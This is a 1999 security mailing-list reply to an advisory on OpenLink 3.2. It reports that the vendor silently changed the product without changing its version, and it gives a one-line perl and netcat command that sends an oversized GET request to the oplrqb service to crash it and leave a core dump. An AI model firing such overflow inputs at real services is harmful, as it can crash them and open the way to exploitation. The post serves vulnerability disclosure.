Re: OpenLine 3.2 Advisory

From: Tymm Twillman (tymmat_private)
Date: Mon Oct 18 1999 - 09:58:48 PDT

    Apparently to complicate issues, OpenLink Software has released a new
    "version" of their product, but hasn't updated the version number.  There
    is also, as far as I can tell, nothing on their website informing users of
    this change.  Even the filenames are the same; I'm told there are
    numerous changes however.

    Anyhow, the newer version doesn't have quite the same problem... but
    ulimit -c unlimited, run oplrqb and try

    perl -e 'print "GET /cgi-bin/testcono?".("A"x2000). "HTTP/1.0\n\n"' | nc
    localhost 8000

    and look for the core... *sigh*.

    -Tymm